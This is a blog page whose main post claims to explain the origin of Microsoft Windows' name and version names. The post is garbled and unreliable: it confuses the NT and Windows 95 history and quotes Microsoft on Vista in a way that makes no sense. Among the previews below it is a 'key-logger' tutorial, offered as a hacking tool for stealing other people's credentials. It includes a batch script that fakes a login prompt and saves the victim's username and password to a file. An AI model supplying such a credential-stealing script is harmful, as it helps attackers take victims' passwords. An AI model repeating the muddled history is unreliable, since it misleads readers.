Skip to main content

Why Microsoft named thier OS 'Windows'?

Have you ever wondered that what “XP” means or where the “Windows” comes from? Some operating systems get their names from obvious places, but others need an explanation. Read on to find out how Microsoft’s Windows OS got its name.

  • We’ve put together the most popular and familiar operating system, of course, Windows with an interesting story behind its name, be sure to teach them to the other readers in the comments.
  • The name Windows came from the fact that the new operating system, Windows 1.0, had windows in which a user could interact with the GUI (Graphical User Interface). “Windows”, always state all the way with the current operating system and the number or name after “Windows” is to know which version of Windows it is.
The tech giant Microsoft stuck with the numbering scheme from 1.0 to 3, 1 when they started working on their new technology (NT), it is a branch of the operating system. Windows NT 4.0 was the first to implement the new NT kernel and was actually released in 1996 with the name Windows 95 user interface.
However, if we talk about the Windows 7 and Windows XP which was released in 2001, XP is synonymous with experience. This experience lasted all the way to 2007 when the tech giant Microsoft launched Windows Vista.

  • According to Microsoft, Vista got its name because “At the end of the day … they’re trying to get their own Vista staff.” It was very philosophical of Microsoft but finally moved to a simpler approach with Windows 7.
  • Windows 7 is the seventh version of Windows since the 95. Although 95 was not the first version of Windows if they count 1.0 to 3.1. But, Windows 10simply does not have the same cycle. In addition, people can get confused with Mac OS 10.

Comments

Popular posts from this blog

Why Do We Have QWERTY Keyboard, Not ABCDE?

Why Do We Have QWERTY Keyboard, Not ABCDE? In electronic devices, there are several types of keyboards among which stand out the standard PC type keyboards. Yes, we are talking about the ones we use when using a computer. Out of all others, QWERTY is the most popular and common. However, have you ever wondered what motivates the order of computer keyboard letters? For this arrangement, known as QWERTY. So, if you are looking for the answer why our computer keyboard letters arranged as QWERTY instead of ABCDE then here we are going to share a reasonable answer.   As we already mentioned, there are lots of keyboards made for computers that use different dimensions and arrangement of keys. However, QWERTY is the most common one.  It was designed around 1968 and has the peculiarity that its name (QWERTY) is the first six letters of its upper row of keys.   The reason dates back to the time where people used typewriters. When the typewriter was first invente...

How to use android device as keyboard and mouse to your pc

Here we are going to see how to use Android device as keyboard and mouse in your PC. Download and Install Intel Remote Keyboard on your Android device and also install Intel Remote Keyboard Host on your windows computer. Make sure your computer and your Android device is connected to the same WiFi network and the on your android device scan for your windows device. Tap on the Windows device name.Now your Windows PC will show you a QR code , scan it with your Android device. Now both the devices will be paired and you use your Android device as mouse and keyboard for your computer. You can also Switch user,Log off,Sleep,Restart and also Shutdown from your Android device. I hope this article is useful if any doubt mail me at.

How to Create a key-logger?

The key-logger is one of the oldest tools in the world of hacking, but despite this, it is still effective. Next ,i'm going to show you how to create key-logger in a simple way, using notepad. What is Key-logger?  A key-logger is a type of spyware that records all keystrokes on victims computer secretly. Key-logger are widely used by cyber-criminals to obtain information on bank accounts and credit cards, data such as usernames, passwords, and other personal information . HOW TO MAKE A KEY-LOGGER?  Here is a basic key-logger script for beginners to understand the basics of how key-logging works in notepad. Open notepad on your Windows and paste the script given below. @echo off  color a title Login cls echo Please Enter Your Email Address and Password echo. echo. cd C:\Logs set /p user= Username: set /p pass=Password: echo Username="%user%" Password="%pass%" Log.txt start http://TechiViewer.com/ exit ...